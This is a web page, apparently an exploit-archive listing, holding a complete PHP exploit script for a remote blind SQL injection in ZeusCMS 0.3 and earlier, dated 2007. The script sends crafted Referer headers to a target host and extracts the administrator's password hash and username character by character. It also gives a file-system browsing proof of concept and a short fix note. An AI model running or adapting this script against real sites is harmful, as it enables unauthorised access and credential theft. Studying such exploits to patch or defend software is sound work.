477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
152 lines
4.2 KiB
PHP
Executable file
152 lines
4.2 KiB
PHP
Executable file
<?
|
|
|
|
/*
|
|
-------------------------------------------------
|
|
ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit
|
|
-------------------------------------------------
|
|
|
|
author...: EgiX
|
|
mail.....: n0b0d13s[at]gmail[dot]com
|
|
|
|
link.....: http://www.zeuscms.gr/
|
|
details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER array)
|
|
|
|
[-] Blind SQL Injection in /index.php :
|
|
|
|
129. $blockedRefCheck=security::checkRef($_SERVER["HTTP_REFERER"]); <==
|
|
130.
|
|
131. if(@in_array($_SERVER['REMOTE_ADDR'],$blockedips) || $blockedRefCheck==TRUE){
|
|
132. include "html_files/denied.html";
|
|
133. }
|
|
134. else
|
|
|
|
[-] checkRef() function defined in /security.php :
|
|
|
|
130. function checkref($ref){
|
|
131. if($ref){
|
|
132. $res=eregi_replace("http://","",$ref);
|
|
133. include "dbase.php";
|
|
134. $table=$prefix."referers";
|
|
135. $res=$db->query("SELECT * FROM $table WHERE url like '%$ref%' AND status='BLOCKED'"); <==
|
|
136. if($res->numRows()>0){
|
|
137. return true;
|
|
138. }
|
|
139. else{
|
|
140. return false;
|
|
141. }
|
|
142. }else{
|
|
143. return false;
|
|
144. }
|
|
|
|
an attacker can inject sql code through http referer header, that isn't properly checked...
|
|
|
|
[*] Possible bug fix in /index.php :
|
|
|
|
128. $ref = security::safeGet($_SERVER["HTTP_REFERER"]);
|
|
129. $blockedRefCheck = security::checkRef($ref);
|
|
|
|
[-] there is also a possible file system browsing through /image_viewer.php, p.o.c. :
|
|
|
|
http://[host]/[path]/image_viewer.php?dir=/
|
|
*/
|
|
|
|
error_reporting(0);
|
|
ini_set("default_socket_timeout", 5);
|
|
set_time_limit(0);
|
|
|
|
function http_send($host, $packet)
|
|
{
|
|
$sock = fsockopen($host, 80);
|
|
while (!$sock)
|
|
{
|
|
print "\n[-] No response from {$host}:80 Trying again...";
|
|
$sock = fsockopen($host, 80);
|
|
sleep(1);
|
|
}
|
|
fputs($sock, $packet);
|
|
$resp = "";
|
|
while (!feof($sock)) $resp .= fread($sock, 1);
|
|
fclose($sock);
|
|
return $resp;
|
|
}
|
|
|
|
function check_query($sql)
|
|
{
|
|
global $host, $path;
|
|
|
|
$packet = "GET {$path} HTTP/1.1\r\n";
|
|
$packet.= "Host: {$host}\r\n";
|
|
$packet.= "Referer: {$sql} \r\n";
|
|
$packet.= "Keep-Alive: 300\r\n";
|
|
$packet.= "Connection: keep-alive\r\n\r\n";
|
|
$html = http_send($host, $packet);
|
|
|
|
return (preg_match("/DENIED/", $html) ? true : false);
|
|
}
|
|
|
|
print "\n+-----------------------------------------------------------+";
|
|
print "\n| ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit by EgiX |";
|
|
print "\n+-----------------------------------------------------------+\n";
|
|
|
|
if ($argc < 3)
|
|
{
|
|
print "\nUsage......: php $argv[0] host path [prefix] [userid]\n";
|
|
print "\nhost.......: target server (ip/hostname)";
|
|
print "\npath.......: path to ZeusCMS directory (example: / or /zeuscms/)";
|
|
print "\nprefix.....: table's prefix (default: ze)";
|
|
print "\nuserid.....: user id (default: 1 - admin)\n";
|
|
die();
|
|
}
|
|
|
|
$host = $argv[1];
|
|
$path = $argv[2];
|
|
$pre = (isset($argv[3]) ? $argv[3] : "ze");
|
|
$uid = (isset($argv[4]) ? $argv[4] : "1");
|
|
|
|
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
|
|
$index = 1; $md5 = "";
|
|
print "\n[-] MD5 Hash: ";
|
|
|
|
while (!strpos($md5, chr(0)))
|
|
{
|
|
for ($i = 0; $i <= count($hash); $i++)
|
|
{
|
|
if ($i == count($hash)) die("\n[-] Exploit failed...\n");
|
|
|
|
$sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/pwd,1,1,1/**/FROM/**/{$pre}_users/**/" .
|
|
"WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(pwd,{$index},1))={$hash[$i]}/*";
|
|
|
|
if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; }
|
|
}
|
|
|
|
$index++;
|
|
}
|
|
|
|
$char = array(0); // null char
|
|
for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z
|
|
for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z
|
|
for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9
|
|
|
|
$index = 1; $user = "";
|
|
print "\n[-] Username: ";
|
|
|
|
while (!strpos($user, chr(0)))
|
|
{
|
|
for ($i = 0; $i <= count($char); $i++)
|
|
{
|
|
if ($i == count($char)) die("\n[-] Exploit failed...\n");
|
|
|
|
$sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" .
|
|
"WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(nickname,{$index},1))={$char[$i]}/*";
|
|
|
|
if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; }
|
|
}
|
|
|
|
$index++;
|
|
}
|
|
|
|
print "\n\n[-] Successfull!\n";
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2007-12-27]
|